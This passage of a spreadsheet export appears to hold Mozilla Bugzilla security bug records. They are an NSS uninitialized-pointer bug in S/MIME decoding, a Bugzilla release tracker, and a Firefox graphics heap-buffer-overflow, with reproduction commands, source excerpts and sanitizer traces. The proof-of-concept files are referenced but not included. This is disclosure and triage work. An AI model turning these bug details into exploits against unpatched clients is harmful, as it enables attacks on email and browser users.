        </is>
      </c>
      <c r="P2399" t="inlineStr">
        <is>
          <t>[adv-main101+][adv-esr91.10+][post-critsmash-triage]</t>
        </is>
      </c>
      <c r="Q2399" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2399" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="S2399" t="inlineStr">
        <is>
          <t>3.79</t>
        </is>
      </c>
      <c r="T2399" t="n">
        <v>1</v>
      </c>
      <c r="U2399" t="n">
        <v>0</v>
      </c>
      <c r="V2399" t="n">
        <v>16</v>
      </c>
      <c r="W2399" t="inlineStr">
        <is>
          <t>Created attachment 9274927
POC file
This is a bug I encountered in the decryption process of CMS messages in NSS, triggerable by passing a malicious message to NSS_CMSDecoder_Update. This flow is used by Thunderbird and Evolution when attempting to read S/MIME encrypted emails.
In NSS_CMSDigestContext_FinishSingle, variable `dp` is supposed to be initialized by a successful call to NSS_CMSDigestContext_FinishMultiple, and then dereferenced and passed to SECITEM_CopyItem as the third argument:
```
SECStatus
NSS_CMSDigestContext_FinishSingle(NSSCMSDigestContext *cmsdigcx,
                                  PLArenaPool *poolp,
                                  SECItem *digest)
{
    ...
    SECItem **dp;
    ...
    /* get the digests into arena, then copy the first digest into poolp */
    rv = NSS_CMSDigestContext_FinishMultiple(cmsdigcx, arena, &amp;dp);
    if (rv == SECSuccess) {
        /* now copy it into poolp */
        rv = SECITEM_CopyItem(poolp, digest, dp[0]);
    }
    ...
```
However, NSS_CMSDigestContext_FinishMultiple can return SECSuccess without initializing the passed dp argument. This happens in case `cmsdigcx-&gt;saw_contents == 0`:
```
    /* no contents? do not finish digests */  
    if (digestsp == NULL || !cmsdigcx-&gt;saw_contents) {
        rv = SECSuccess;
        goto cleanup;
    }
```
I'm not sure exactly what in the input causes the program to arrive to this state, but it seems to be some bug in the ASN.1 parsing code.
When this happens, dp remains uninitialized when SECITEM_CopyItem is called, and one of following may happen:
    1. Crash in NSS_CMSDigestContext_FinishSingle when attempting to read `dp[0]`.
    2. Crash in SECITEM_CopyItem when attempting to read from pointer `dp[0]-&gt;data`.
    3. If stack memory is properly groomed by an attacker, valid memory of `dp[0]-&gt;len` bytes will be read from pointer `dp[0]-&gt;data` into an object.
I reproduced this on Thunderbird and Evolution (.p7m email attachment), and on cmsutil compiled from trunk.
Steps to reproduce:
`$ cmsutil -D -d . -i poc.cms`
MSan log:
```
==3958692==WARNING: MemorySanitizer: use-of-uninitialized-value
    #0 0x7ffff75a00eb in NSS_CMSDigestContext_FinishSingle ./lib/smime/cmsdigest.c:258:46
    #1 0x7ffff759b3f0 in NSS_CMSDigestedData_Decode_AfterData ./lib/smime/cmsdigdata.c:187:14
    #2 0x7ffff7594f84 in nss_cms_after_data ./lib/smime/cmsdecode.c:367:18
    #3 0x7ffff758da0a in nss_cms_decoder_notify ./lib/smime/cmsdecode.c:185:21
    #4 0x7ffff77eed10 in sec_asn1d_notify_after ./lib/util/secasn1d.c:437:5
    #5 0x7ffff77cea44 in sec_asn1d_next_in_sequence ./lib/util/secasn1d.c:2078:5
    #6 0x7ffff77b2e35 in SEC_ASN1DecoderUpdate_Util ./lib/util/secasn1d.c:2823:17
    #7 0x7ffff758e7a2 in NSS_CMSDecoder_Update ./lib/smime/cmsdecode.c:683:14
    #8 0x4ab1c3 in decode ./cmd/smimetools/cmsutil.c:191:10
    #9 0x4a678a in main ./cmd/smimetools/cmsutil.c:1455:24
    #10 0x7ffff6e35fcf in __libc_start_call_main csu/../sysdeps/nptl/libc_start_call_main.h:58:16
    #11 0x7ffff6e3607c in __libc_start_main csu/../csu/libc-start.c:409:3
    #12 0x420db4 in _start (./dist/Debug/bin/cmsutil+0x420db4)
  Uninitialized value was created by an allocation of 'dp' in the stack frame of function 'NSS_CMSDigestContext_FinishSingle'
    #0 0x7ffff759fa90 in NSS_CMSDigestContext_FinishSingle ./lib/smime/cmsdigest.c:242
SUMMARY: MemorySanitizer: use-of-uninitialized-value ./lib/smime/cmsdigest.c:258:46 in NSS_CMSDigestContext_FinishSingle
```</t>
        </is>
      </c>
      <c r="X2399" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2400">
      <c r="A2400" t="n">
        <v>1072487</v>
      </c>
      <c r="B2400" t="inlineStr">
        <is>
          <t>2014-09-24 12:02:06 -0700</t>
        </is>
      </c>
      <c r="C2400" t="inlineStr">
        <is>
          <t>Release Bugzilla 4.5.6, 4.4.6, 4.2.11 and 4.0.15</t>
        </is>
      </c>
      <c r="D2400" t="inlineStr">
        <is>
          <t>2014-10-06 11:29:32 -0700</t>
        </is>
      </c>
      <c r="E2400" t="n">
        <v>1</v>
      </c>
      <c r="F2400" t="n">
        <v>1</v>
      </c>
      <c r="G2400" t="n">
        <v>4</v>
      </c>
      <c r="H2400" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I2400" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J2400" t="inlineStr">
        <is>
          <t>Bugzilla-General</t>
        </is>
      </c>
      <c r="K2400" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2400" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2400" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2400" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2400" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2400" t="inlineStr"/>
      <c r="Q2400" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2400" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S2400" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2400" t="n">
        <v>1</v>
      </c>
      <c r="U2400" t="n">
        <v>0</v>
      </c>
      <c r="V2400" t="n">
        <v>17</v>
      </c>
      <c r="W2400" t="inlineStr">
        <is>
          <t>This is the tracking bug for the upcoming Release Bugzilla 4.4.6, 4.2.11 and 4.0.15 releases. 
All releases have one or more security fixes included.</t>
        </is>
      </c>
      <c r="X2400" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2401">
      <c r="A2401" t="n">
        <v>1452375</v>
      </c>
      <c r="B2401" t="inlineStr">
        <is>
          <t>2018-04-07 06:11:34 -0700</t>
        </is>
      </c>
      <c r="C2401" t="inlineStr">
        <is>
          <t>AddressSanitizer: heap-buffer-overflow /builds/worker/workspace/build/src/gfx/2d/ssse3-scaler.c:202:16 in ssse3_fetch_horizontal</t>
        </is>
      </c>
      <c r="D2401" t="inlineStr">
        <is>
          <t>2024-05-30 09:44:55 -0700</t>
        </is>
      </c>
      <c r="E2401" t="n">
        <v>1</v>
      </c>
      <c r="F2401" t="n">
        <v>1</v>
      </c>
      <c r="G2401" t="n">
        <v>3</v>
      </c>
      <c r="H2401" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2401" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2401" t="inlineStr">
        <is>
          <t>Graphics</t>
        </is>
      </c>
      <c r="K2401" t="inlineStr">
        <is>
          <t>61 Branch</t>
        </is>
      </c>
      <c r="L2401" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2401" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2401" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2401" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2401" t="inlineStr">
        <is>
          <t>[adv-main61+][adv-esr52.9+][adv-esr60.1+][post-critsmash-triage]</t>
        </is>
      </c>
      <c r="Q2401" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R2401" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2401" t="inlineStr">
        <is>
          <t>mozilla62</t>
        </is>
      </c>
      <c r="T2401" t="n">
        <v>1</v>
      </c>
      <c r="U2401" t="n">
        <v>0</v>
      </c>
      <c r="V2401" t="n">
        <v>49</v>
      </c>
      <c r="W2401" t="inlineStr">
        <is>
          <t xml:space="preserve">Created attachment 8965958
heapbuffer.html.gz
User Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36
Steps to reproduce:
tested on Nightly 61.0a1 (2018-04-06) (64-bit) build. Not minimized sample
firefox --private-window -no-remote heapbuffer.html
Actual results:
==12958==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6210023424fc at pc 0x7f365bba05bd bp 0x7f3606386790 sp 0x7f3606386788
READ of size 8 at 0x6210023424fc thread T30 (Compositor)
    #0 0x7f365bba05bc in ssse3_fetch_horizontal /builds/worker/workspace/build/src/gfx/2d/ssse3-scaler.c:202:16
    #1 0x7f365bba05bc in ssse3_fetch_bilinear_cover /builds/worker/workspace/build/src/gfx/2d/ssse3-scaler.c:325
    #2 0x7f365bba05bc in ssse3_scale_data /builds/worker/workspace/build/src/gfx/2d/ssse3-scaler.c:556
    #3 0x7f365c28eb28 in mozilla::layers::AttemptVideoScale(mozilla::layers::TextureSourceBasic*, mozilla::gfx::SourceSurface const*, float, mozilla::gfx::CompositionOp, mozilla::layers::TexturedEffect const*, mozilla::gfx::BaseMatrix&lt;float&gt; const&amp;, mozilla::gfx::RectTyped&lt;mozilla::gfx::UnknownUnits, float&gt; const&amp;, mozilla::gfx::RectTyped&lt;mozilla::gfx::UnknownUnits, float&gt; const&amp;, mozilla::gfx::DrawTarget*, mozilla::gfx::DrawTarget const*) /builds/worker/workspace/build/src/gfx/layers/basic/BasicCompositor.cpp:560:5
    #4 0x7f365c25c690 in void mozilla::layers::BasicCompositor::DrawGeometry&lt;mozilla::gfx::RectTyped&lt;mozilla::gfx::UnknownUnits, float&gt; &gt;(mozilla::gfx::RectTyped&lt;mozilla::gfx::UnknownUnits, float&gt; const&amp;, mozilla::gfx::RectTyped&lt;mozilla::gfx::UnknownUnits, float&gt; const&amp;, mozilla::gfx::IntRectTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;, mozilla::layers::EffectChain const&amp;, float, mozilla::gfx::Matrix4x4Typed&lt;mozilla::gfx::UnknownUnits, mozilla::gfx::UnknownUnits&gt; const&amp;, mozilla::gfx::RectTyped&lt;mozilla::gfx::UnknownUnits, float&gt; const&amp;, bool) /builds/worker/workspace/build/src/gfx/layers/basic/BasicCompositor.cpp:773:13
    #5 0x7f365c25af0e in mozilla::layers::BasicCompositor::DrawQuad(mozilla::gfx::RectTyped&lt;mozilla::gfx::UnknownUnits, float&gt; const&amp;, mozilla::gfx::IntRectTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;, mozilla::layers::EffectChain const&amp;, float, mozilla::gfx::Matrix4x4Typed&lt;mozilla::gfx::UnknownUnits, mozilla::gfx::UnknownUnits&gt; const&amp;, mozilla::gfx::RectTyped&lt;mozilla::gfx::UnknownUnits, float&gt; const&amp;) /builds/worker/workspace/build/src/gfx/layers/basic/BasicCompositor.cpp:644:3
    #6 0x7f365bfb24be in mozilla::layers::Compositor::DrawGeometry(mozilla::gfx::RectTyped&lt;mozilla::gfx::UnknownUnits, float&gt; const&amp;, mozilla::gfx::IntRectTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;, mozilla::layers::EffectChain const&amp;, float, mozilla::gfx::Matrix4x4Typed&lt;mozilla::gfx::UnknownUnits, mozilla::gfx::UnknownUnits&gt; const&amp;, mozilla::gfx::RectTyped&lt;mozilla::gfx::UnknownUnits, float&gt; const&amp;, mozilla::Maybe&lt;mozilla::gfx::PolygonTyped&lt;mozilla::gfx::UnknownUnits&gt; &gt; const&amp;) /builds/worker/workspace/build/src/gfx/layers/Compositor.cpp:227:5
    #7 0x7f365c36ef95 in DrawGeometry /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/layers/Compositor.h:304:5
    #8 0x7f365c36ef95 in mozilla::layers::ImageHost::Composite(mozilla::layers::Compositor*, mozilla::layers::LayerComposite*, mozilla::layers::EffectChain&amp;, float, mozilla::gfx::Matrix4x4Typed&lt;mozilla::gfx::UnknownUnits, mozilla::gfx::UnknownUnits&gt; const&amp;, mozilla::gfx::SamplingFilter, mozilla::gfx::IntRectTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;, mozilla::gfx::IntRegionTyped&lt;mozilla::gfx::UnknownUnits&gt; const*, mozilla::Maybe&lt;mozilla::gfx::PolygonTyped&lt;mozilla::gfx::UnknownUnits&gt; &gt; const&amp;) /builds/worker/workspace/build/src/gfx/layers/composite/ImageHost.cpp:298
    #9 0x7f365c3c4feb in mozilla::layers::ImageLayerComposite::RenderLayer(mozilla::gfx::IntRectTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;, mozilla::Maybe&lt;mozilla::gfx::PolygonTyped&lt;mozilla::gfx::UnknownUnits&gt; &gt; const&amp;)::$_0::operator()(mozilla::layers::EffectChain&amp;, mozilla::gfx::IntRectTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;) const /builds/worker/workspace/build/src/gfx/layers/composite/ImageLayerComposite.cpp:106:17
    #10 0x7f365c373a9e in RenderWithAllMasks&lt;(lambda at /builds/worker/workspace/build/src/gfx/layers/composite/ImageLayerComposite.cpp:104:22)&gt; /builds/worker/workspace/build/src/gfx/layers/composite/LayerManagerComposite.h:738:5
    #11 0x7f365c373a9e in mozilla::layers::ImageLayerComposite::RenderLayer(mozilla::gfx::IntRectTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;, mozilla::Maybe&lt;mozilla::gfx::PolygonTyped&lt;mozilla::gfx::UnknownUnits&gt; &gt; const&amp;) /builds/worker/workspace/build/src/gfx/layers/composite/ImageLayerComposite.cpp:103
    #12 0x7f365c35c3e6 in void mozilla::layers::RenderLayers&lt;mozilla::layers::ContainerLayerComposite&gt;(mozilla::layers::ContainerLayerComposite*, mozilla::layers::LayerManagerComposite*, mozilla::gfx::IntRectTyped&lt;mozilla::RenderTargetPixel&gt; const&amp;, mozilla::Maybe&lt;mozilla::gfx::PolygonTyped&lt;mozilla::gfx::UnknownUnits&gt; &gt; const&amp;) /builds/worker/workspace/build/src/gfx/layers/composite/ContainerLayerComposite.cpp:443:22
    #13 0x7f365c3595de in void mozilla::layers::RenderIntermediate&lt;mozilla::layers::ContainerLayerComposite&gt;(mozilla::layers::ContainerLayerComposite*, mozilla::layers::LayerManagerComposite*, mozilla::gfx::IntRectTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;, RefPtr&lt;mozilla::layers::CompositingRenderTarget&gt;) /builds/worker/workspace/build/src/gfx/layers/composite/ContainerLayerComposite.cpp:554:3
    #14 0x7f365c328439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73:9
    #15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16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17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18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19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20 0x7f365c32b81e in void mozilla::layers::ContainerPrepare&lt;mozilla::layers::RefLayerComposite&gt;(mozilla::layers::RefLayerComposite*, mozilla::layers::LayerManagerComposite*, mozilla::gfx::IntRectTyped&lt;mozilla::RenderTargetPixel&gt; const&amp;) /builds/worker/workspace/build/src/gfx/layers/composite/ContainerLayerComposite.cpp:238:20
    #21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22 0x7f365c3854c0 in mozilla::layers::LayerManagerComposite::Render(mozilla::gfx::IntRegionTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;, mozilla::gfx::IntRegionTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;) /builds/worker/workspace/build/src/gfx/layers/composite/LayerManagerComposite.cpp:944:18
    #23 0x7f365c383244 in mozilla::layers::LayerManagerComposite::UpdateAndRender() /builds/worker/workspace/build/src/gfx/layers/composite/LayerManagerComposite.cpp:533:3
    #24 0x7f365c381b26 in mozilla::layers::LayerManagerComposite::EndTransaction(mozilla::TimeStamp const&amp;, mozilla::layers::LayerManager::EndTransactionFlags) /builds/worker/workspace/build/src/gfx/layers/composite/LayerManagerComposite.cpp:463:5
    #25 0x7f365c3d4882 in mozilla::layers::CompositorBridgeParent::CompositeToTarget(mozilla::gfx::DrawTarget*, mozilla::gfx::IntRectTyped&lt;mozilla::gfx::UnknownUnits&gt; const*) /builds/worker/workspace/build/src/gfx/layers/ipc/CompositorBridgeParent.cpp:1022:18
    #26 0x7f365c3eae75 in mozilla::layers::CompositorVsyncScheduler::Composite(mozilla::TimeStamp) /builds/worker/workspace/build/src/gfx/layers/ipc/CompositorVsyncScheduler.cpp:243:27
    #27 0x7f365c438e60 in applyImpl&lt;mozilla::layers::CompositorVsyncScheduler, void (mozilla::layers::CompositorVsyncScheduler::*)(mozilla::TimeStamp), StoreCopyPassByConstLRef&lt;mozilla::TimeStamp&gt; , 0&gt; /builds/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:1164:12
    #28 0x7f365c438e60 in apply&lt;mozilla::layers::CompositorVsyncScheduler, void (mozilla::layers::CompositorVsyncScheduler::*)(mozilla::TimeStamp)&gt; /builds/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:1170
    #29 0x7f365c438e60 in mozilla::detail::RunnableMethodImpl&lt;mozilla::layers::CompositorVsyncScheduler*, void (mozilla::layers::CompositorVsyncScheduler::*)(mozilla::TimeStamp), true, (mozilla::RunnableKind)1, mozilla::TimeStamp&gt;::Run() /builds/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:1215
    #30 0x7f365a99cb23 in RunTask /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:452:9
    #31 0x7f365a99cb23 in DeferOrRunPendingTask /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:460
    #32 0x7f365a99cb23 in MessageLoop::DoWork() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:535
    #33 0x7f365a99ea98 in base::MessagePumpDefault::Run(base::MessagePump::Delegate*) /builds/worker/workspace/build/src/ipc/chromium/src/base/message_pump_default.cc:36:31
    #34 0x7f365a99a139 in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:326:10
    #35 0x7f365a99a139 in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:319
    #36 0x7f365a99a139 in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:299
    #37 0x7f365a9b830f in base::Thread::ThreadMain() /builds/worker/workspace/build/src/ipc/chromium/src/base/thread.cc:181:16
    #38 0x7f365a9aaf1c in ThreadFunc(void*) /builds/worker/workspace/build/src/ipc/chromium/src/base/platform_thread_posix.cc:38:13
    #39 0x7f367b88a7fb in start_thread (/lib/x86_64-linux-gnu/libpthread.so.0+0x77fb)
    #40 0x7f367a8b8b5e in clone (/lib/x86_64-linux-gnu/libc.so.6+0x114b5e)
0x6210023424fc is located 4 bytes to the left of 4111-byte region [0x621002342500,0x62100234350f)
allocated by thread T30 (Compositor) here:
    #0 0x4c54b3 in malloc /builds/worker/workspace/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:88:3
    #1 0x7f365bd6bb26 in Realloc /builds/worker/workspace/build/src/gfx/2d/Tools.h:205:41
    #2 0x7f365bd6bb26 in mozilla::gfx::SourceSurfaceAlignedRawData::Init(mozilla::gfx::IntSizeTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;, mozilla::gfx::SurfaceFormat, bool, unsigned char, int) /builds/worker/workspace/build/src/gfx/2d/SourceSurfaceRawData.cpp:68
    #3 0x7f365bbc94dc in mozilla::gfx::Factory::CreateDataSourceSurface(mozilla::gfx::IntSizeTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;, mozilla::gfx::SurfaceFormat, bool) /builds/worker/workspace/build/src/gfx/2d/Factory.cpp:1077:16
    #4 0x7f365c288685 in mozilla::layers::WrappingTextureSourceYCbCrBasic::GetSurface(mozilla::gfx::DrawTarget*) /builds/worker/workspace/build/src/gfx/layers/basic/BasicCompositor.cpp:124:18
    #5 0x7f365c25c61b in void mozilla::layers::BasicCompositor::DrawGeometry&lt;mozilla::gfx::RectTyped&lt;mozilla::gfx::UnknownUnits, float&gt; &gt;(mozilla::gfx::RectTyped&lt;mozilla::gfx::UnknownUnits, float&gt; const&amp;, mozilla::gfx::RectTyped&lt;mozilla::gfx::UnknownUnits, float&gt; const&amp;, mozilla::gfx::IntRectTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;, mozilla::layers::EffectChain const&amp;, float, mozilla::gfx::Matrix4x4Typed&lt;mozilla::gfx::UnknownUnits, mozilla::gfx::UnknownUnits&gt; const&amp;, mozilla::gfx::RectTyped&lt;mozilla::gfx::UnknownUnits, float&gt; const&amp;, bool) /builds/worker/workspace/build/src/gfx/layers/basic/BasicCompositor.cpp:770:29
    #6 0x7f365c25af0e in mozilla::layers::BasicCompositor::DrawQuad(mozilla::gfx::RectTyped&lt;mozilla::gfx::UnknownUnits, float&gt; const&amp;, mozilla::gfx::IntRectTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;, mozilla::layers::EffectChain const&amp;, float, mozilla::gfx::Matrix4x4Typed&lt;mozilla::gfx::UnknownUnits, mozilla::gfx::UnknownUnits&gt; const&amp;, mozilla::gfx::RectTyped&lt;mozilla::gfx::UnknownUnits, float&gt; const&amp;) /builds/worker/workspace/build/src/gfx/layers/basic/BasicCompositor.cpp:644:3
    #7 0x7f365bfb24be in mozilla::layers::Compositor::DrawGeometry(mozilla::gfx::RectTyped&lt;mozilla::gfx::UnknownUnits, float&gt; const&amp;, mozilla::gfx::IntRectTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;, mozilla::layers::EffectChain const&amp;, float, mozilla::gfx::Matrix4x4Typed&lt;mozilla::gfx::UnknownUnits, mozilla::gfx::UnknownUnits&gt; const&amp;, mozilla::gfx::RectTyped&lt;mozilla::gfx::UnknownUnits, float&gt; const&amp;, mozilla::Maybe&lt;mozilla::gfx::PolygonTyped&lt;mozilla::gfx::UnknownUnits&gt; &gt; const&amp;) /builds/worker/workspace/build/src/gfx/layers/Compositor.cpp:227:5
    #8 0x7f365c36ef95 in DrawGeometry /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/layers/Compositor.h:304:5
    #9 0x7f365c36ef95 in mozilla::layers::ImageHost::Composite(mozilla::layers::Compositor*, mozilla::layers::LayerComposite*, mozilla::layers::EffectChain&amp;, float, mozilla::gfx::Matrix4x4Typed&lt;mozilla::gfx::UnknownUnits, mozilla::gfx::UnknownUnits&gt; const&amp;, mozilla::gfx::SamplingFilter, mozilla::gfx::IntRectTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;, mozilla::gfx::IntRegionTyped&lt;mozilla::gfx::UnknownUnits&gt; const*, mozilla::Maybe&lt;mozilla::gfx::PolygonTyped&lt;mozilla::gfx::UnknownUnits&gt; &gt; const&amp;) /builds/worker/workspace/build/src/gfx/layers/composite/ImageHost.cpp:298
    #10 0x7f365c3c4feb in mozilla::layers::ImageLayerComposite::RenderLayer(mozilla::gfx::IntRectTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;, mozilla::Maybe&lt;mozilla::gfx::PolygonTyped&lt;mozilla::gfx::UnknownUnits&gt; &gt; const&amp;)::$_0::operator()(mozilla::layers::EffectChain&amp;, mozilla::gfx::IntRectTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;) const /builds/worker/workspace/build/src/gfx/layers/composite/ImageLayerComposite.cpp:106:17
    #11 0x7f365c373a9e in RenderWithAllMasks&lt;(lambda at /builds/worker/workspace/build/src/gfx/layers/composite/ImageLayerComposite.cpp:104:22)&gt; /builds/worker/workspace/build/src/gfx/layers/composite/LayerManagerComposite.h:738:5
    #12 0x7f365c373a9e in mozilla::layers::ImageLayerComposite::RenderLayer(mozilla::gfx::IntRectTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;, mozilla::Maybe&lt;mozilla::gfx::PolygonTyped&lt;mozilla::gfx::UnknownUnits&gt; &gt; const&amp;) /builds/worker/workspace/build/src/gfx/layers/composite/ImageLayerComposite.cpp:103
    #13 0x7f365c35c3e6 in void mozilla::layers::RenderLayers&lt;mozilla::layers::ContainerLayerComposite&gt;(mozilla::layers::ContainerLayerComposite*, mozilla::layers::LayerManagerComposite*, mozilla::gfx::IntRectTyped&lt;mozilla::RenderTargetPixel&gt; const&amp;, mozilla::Maybe&lt;mozilla::gfx::PolygonTyped&lt;mozilla::gfx::UnknownUnits&gt; &gt; const&amp;) /builds/worker/workspace/build/src/gfx/layers/composite/ContainerLayerComposite.cpp:443:22
    #14 0x7f365c3595de in void mozilla::layers::RenderIntermediate&lt;mozilla::layers::ContainerLayerComposite&gt;(mozilla::layers::ContainerLayerComposite*, mozilla::layers::LayerManagerComposite*, mozilla::gfx::IntRectTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;, RefPtr&lt;mozilla::layers::CompositingRenderTarget&gt;) /builds/worker/workspace/build/src/gfx/layers/composite/ContainerLayerComposite.cpp:554:3
    #15 0x7f365c328439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73:9
    #16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17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18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19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20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21 0x7f365c32b81e in void mozilla::layers::ContainerPrepare&lt;mozilla::layers::RefLayerComposite&gt;(mozilla::layers::RefLayerComposite*, mozilla::layers::LayerManagerComposite*, mozilla::gfx::IntRectTyped&lt;mozilla::RenderTargetPixel&gt; const&amp;) /builds/worker/workspace/build/src/gfx/layers/composite/ContainerLayerComposite.cpp:238:20
    #22 0x7f365c3276ce in void mozilla::layers::ContainerPrepare&lt;mozilla::layers::ContainerLayerComposite&gt;(mozilla::layers::ContainerLayerComposite*, mozilla::layers::LayerManagerComposite*, mozilla::gfx::IntRectTyped&lt;mozilla::RenderTargetPixel&gt; const&amp;) /builds/worker/workspace/build/src/gfx/layers/composite/ContainerLayerComposite.cpp:238:20
    #23 0x7f365c3854c0 in mozilla::layers::LayerManagerComposite::Render(mozilla::gfx::IntRegionTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;, mozilla::gfx::IntRegionTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;) /builds/worker/workspace/build/src/gfx/layers/composite/LayerManagerComposite.cpp:944:18
    #24 0x7f365c383244 in mozilla::layers::LayerManagerComposite::UpdateAndRender() /builds/worker/workspace/build/src/gfx/layers/composite/LayerManagerComposite.cpp:533:3
    #25 0x7f365c381b26 in mozilla::layers::LayerManagerComposite::EndTransaction(mozilla::TimeStamp const&amp;, mozilla::layers::LayerManager::EndTransactionFlags) /builds/worker/workspace/build/src/gfx/layers/composite/LayerManagerComposite.cpp:463:5
    #26 0x7f365c3d4882 in mozilla::layers::CompositorBridgeParent::CompositeToTarget(mozilla::gfx::DrawTarget*, mozilla::gfx::IntRectTyped&lt;mozilla::gfx::UnknownUnits&gt; const*) /builds/worker/workspace/build/src/gfx/layers/ipc/CompositorBridgeParent.cpp:1022:18
    #27 0x7f365c3eae75 in mozilla::layers::CompositorVsyncScheduler::Composite(mozilla::TimeStamp) /builds/worker/workspace/build/src/gfx/layers/ipc/CompositorVsyncScheduler.cpp:243:27
    #28 0x7f365c438e60 in applyImpl&lt;mozilla::layers::CompositorVsyncScheduler, void (mozilla::layers::CompositorVsyncScheduler::*)(mozilla::TimeStamp), StoreCopyPassByConstLRef&lt;mozilla::TimeStamp&gt; , 0&gt; /builds/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:1164:12
    #29 0x7f365c438e60 in apply&lt;mozilla::layers::CompositorVsyncScheduler, void (mozilla::layers::CompositorVsyncScheduler::*)(mozilla::TimeStamp)&gt; /builds/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:1170
    #30 0x7f365c438e60 in mozilla::detail::RunnableMethodImpl&lt;mozilla::layers::CompositorVsyncScheduler*, void (mozilla::layers::CompositorVsyncScheduler::*)(mozilla::TimeStamp), true, (mozilla::RunnableKind)1, mozilla::TimeStamp&gt;::Run() /builds/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:1215
    #31 0x7f365a99cb23 in RunTask /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:452:9
    #32 0x7f365a99cb23 in DeferOrRunPendingTask /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:460
    #33 0x7f365a99cb23 in MessageLoop::DoWork() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:535
    #34 0x7f365a99ea98 in base::MessagePumpDefault::Run(base::MessagePump::Delegate*) /builds/worker/workspace/build/src/ipc/chromium/src/base/message_pump_default.cc:36:31
    #35 0x7f365a99a139 in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:326:10
    #36 0x7f365a99a139 in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:319
    #37 0x7f365a99a139 in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:299
    #38 0x7f365a9b830f in base::Thread::ThreadMain() /builds/worker/workspace/build/src/ipc/chromium/src/base/thread.cc:181:16
Thread T30 (Compositor) created by T0 here:
    #0 0x4ae80d in __interceptor_pthread_create /builds/worker/workspace/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_interceptors.cc:204:3
    #1 0x7f365a9a887f in CreateThread /builds/worker/workspace/build/src/ipc/chromium/src/base/platform_thread_posix.cc:135:14
    #2 0x7f365a9a887f in PlatformThread::Create(unsigned long, PlatformThread::Delegate*, unsigned long*) /builds/worker/workspace/build/src/ipc/chromium/src/base/platform_thread_posix.cc:146
    #3 0x7f365a9b7caf in base::Thread::StartWithOptions(base::Thread::Options const&amp;) /builds/worker/workspace/build/src/ipc/chromium/src/base/thread.cc:99:8
